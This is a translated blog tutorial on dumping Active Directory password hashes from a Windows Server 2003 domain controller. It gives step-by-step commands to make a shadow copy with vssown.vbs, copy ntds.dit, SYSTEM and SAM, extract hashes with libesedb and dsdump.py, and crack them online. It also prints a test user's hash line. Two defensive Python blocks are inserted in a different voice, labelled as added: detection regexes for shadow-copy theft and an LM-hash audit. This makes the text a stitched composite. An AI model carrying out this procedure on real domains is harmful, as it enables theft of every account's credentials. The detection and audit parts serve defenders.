Offline broken win2003 domain account password

Source: Internet
Author: User
Tags: domain server


Many methods are described on domestic websites; here I share the procedure that worked in my own experiment.

The procedure follows Tim's article, linked here:

http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

I. Experimental environment: Windows Server 2003 in a domain environment

Setting the environment up is straightforward; search Baidu for instructions.

Tools to prepare: vssown.vbs, BT5 (BackTrack 5), ntds_dump_hash.zip

vssown.vbs: search for it online

http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Create a new domain user, xiaocai, with the password set to 123abcabc.

II. Extract the files on Win2003

1. Copy vssown.vbs to the domain controller, for example onto its desktop.

2. Run cmd as Administrator and execute the following commands:

cd Desktop

cscript //nologo vssown.vbs /start    (enable the Volume Shadow Copy service)

cscript //nologo vssown.vbs /status    (view the service's run status)

cscript //nologo vssown.vbs /create C    (create a snapshot of drive C)

cscript //nologo vssown.vbs /list    (view the information of the snapshot just created)

The listing shows the snapshot's device path inside the system. Copy the ntds.dit and system files (plus sam) to the desktop, replacing [X] with the snapshot number, which was 5 in my case.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\system

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\sam

That completes the file extraction. This step often failed during my attempts, and I have not had time to look into the cause.

Delete the snapshot (this step is optional, but recommended):

cscript //nologo vssown.vbs /delete {b3475a72-86d2-48ec-a22f-6e8dbb82903d}

Copy the three extracted files off the server.
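Every step of the extraction above leaves a process-creation record on the domain controller (Windows Security event 4688 or Sysmon event 1), which is what a defender should alert on. The following detection logic is an added example and is not part of the original post or of vssown.vbs: it scans command lines for the two observable stages of the technique, creating a shadow copy (vssown.vbs /create, vssadmin create shadow, or wmic shadowcopy call create) and reading ntds.dit or the SYSTEM/SAM hive through a HarddiskVolumeShadowCopy device path. The sample events, host names and user names are constructed for the example.

```python
"""Detect shadow-copy-based extraction of ntds.dit and registry hives.

Added example, not from the original post. Scans process command lines of
the kind Windows Security event 4688 or Sysmon event 1 record. All sample
events below are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    host: str
    user: str
    cmdline: str


# Stage 1: a Volume Shadow Copy is created (vssown.vbs, vssadmin or wmic).
SNAPSHOT_CREATE = re.compile(
    r"(vssown\.vbs\s+/create|vssadmin(?:\.exe)?\s+create\s+shadow|"
    r"wmic(?:\.exe)?\s+shadowcopy\s+call\s+create)",
    re.IGNORECASE,
)

# Stage 2: ntds.dit or a registry hive is read through a shadow-copy device path.
SHADOW_PATH = re.compile(r"harddiskvolumeshadowcopy\d+", re.IGNORECASE)
SENSITIVE_FILE = re.compile(
    r"(\\ntds\\ntds\.dit|\\config\\(?:system|sam))\b", re.IGNORECASE
)


def classify(event):
    """Return the list of detection names one event triggers (empty if benign)."""
    hits = []
    if SNAPSHOT_CREATE.search(event.cmdline):
        hits.append("vss_snapshot_created")
    if SHADOW_PATH.search(event.cmdline) and SENSITIVE_FILE.search(event.cmdline):
        hits.append("ntds_or_hive_read_from_shadow_copy")
    return hits


def scan(events):
    """Return (host, user, detection, cmdline) tuples for every hit, in log order."""
    findings = []
    for ev in events:
        for name in classify(ev):
            findings.append((ev.host, ev.user, name, ev.cmdline))
    return findings


# Constructed sample events mirroring the procedure above (not real logs).
SAMPLE_EVENTS = [
    Event("DC01", "CORP\\admin", r"cscript //nologo vssown.vbs /start"),
    Event("DC01", "CORP\\admin", r"cscript //nologo vssown.vbs /create C"),
    Event("DC01", "CORP\\admin",
          r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit ."),
    Event("DC01", "CORP\\admin",
          r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\system ."),
    Event("FS01", "CORP\\backup", r"vssadmin list shadows"),   # listing only: benign
    Event("WS07", "CORP\\alice", r"notepad.exe C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the scan reports one snapshot creation and two sensitive reads, all from DC01; the `vssadmin list shadows` event on the file server is deliberately left unflagged because listing snapshots is routine administration. A snapshot creation on a domain controller followed within minutes by a shadow-copy path read of ntds.dit is the combination worth paging on.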

III. Extract the hashes

Download the tools first. For BT5 I am using this virtual machine image:

VMware image, 32-bit: http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

Default login: root / toor

Start the SSH service (once it is running, the VM can be reached with SecureCRT, which makes file transfer convenient):

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

sshd-generate

/etc/init.d/ssh restart

A slight digression.

Check the VM's IP address with ifconfig, then connect to it with SecureCRT.

Press Alt+P to open the SFTP tab and upload the files to /tmp:

cd /tmp

put SYSTEM ntds.dit ntds_dump_hash.zip

Then switch back to the BT5 shell tab.

cd /tmp

ls

# Unzip ntds_dump_hash.zip

unzip ntds_dump_hash.zip

# Compile libesedb

cd libesedb

chmod +x configure

./configure && make

# Export the tables of the ntds.dit database

cd esedbtools

./esedbdumphash ../../ntds.dit

# Extract the hashes (the SYSTEM hive supplies the boot key used to decrypt them)

cd ../../creddump/

python ./dsdump.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable

After extraction, the following entry for the test user was found (format: user:RID:LM hash:NT hash:::):

xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::

IV. Crack the hash

There are many ways to crack the hash; here an online cracker is used. Paste the highlighted hash fields into the site: http://www.objectif-securite.ch/en/ophcrack.php
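The line shown in section III and the quick online crack in section IV are connected by one detail: the third field is an LM hash, and it is not the fixed "empty LM" value, so this Windows Server 2003 domain still stores LM hashes, which is exactly what rainbow-table sites such as the one linked above crack in seconds. The audit below is an added example, not code from the original post, from creddump or from ntdsxtract: it parses dsdump.py-style lines and reports accounts that still carry a real LM hash (the NoLMHash policy is the fix) and accounts whose NT hash is the well-known hash of the empty password. The xiaocai line is the one from the post; the other sample lines are constructed.

```python
"""Audit a pwdump-style hash dump for LM-hash exposure and empty passwords.

Added example, not from the original post or the tools it uses. dsdump.py
prints one line per account in the form
    user:rid:lm_hash:nt_hash:::
A domain that has stopped storing LM hashes shows the fixed empty-LM value
in the third field instead of a real hash.
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string


def parse_line(line):
    """Parse 'user:rid:lm:nt:::' into a dict; return None for malformed input."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    return {
        "user": parts[0],
        "rid": int(parts[1]),
        "lm": parts[2].lower(),
        "nt": parts[3].lower(),
    }


def audit(lines):
    """Map each problematic user to its list of issues.

    Issues reported:
      lm_hash_stored  -- a real LM hash is present (NoLMHash not enforced),
                         so the password is exposed to LM rainbow tables
      empty_password  -- the NT hash equals the hash of the empty password
    Accounts without issues are omitted; malformed lines are skipped.
    """
    findings = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        issues = []
        if rec["lm"] and rec["lm"] != EMPTY_LM:
            issues.append("lm_hash_stored")
        if rec["nt"] == EMPTY_NT:
            issues.append("empty_password")
        if issues:
            findings[rec["user"]] = issues
    return findings


# First line is the one from the post; the rest are constructed for this example.
SAMPLE_DUMP = [
    "xiaocai:1109:8a79528ccd6e0dbffcd6b8db0f458c37:3b0de00581a39a49946206e0998b7df7:::",
    "svc_backup:1110:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "garbage line without fields",
]

if __name__ == "__main__":
    for user, issues in audit(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(issues)}")
```

On the sample dump the audit flags xiaocai for a stored LM hash and the constructed guest entry for an empty password, while svc_backup (empty-LM marker, non-empty NT hash) passes. Running this over a sanctioned dump of your own directory is a quick way to find out whether the rainbow-table crack in section IV would work against your accounts; the remedy is the "Network security: Do not store LAN Manager hash value on next password change" policy followed by a password change for the affected accounts.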
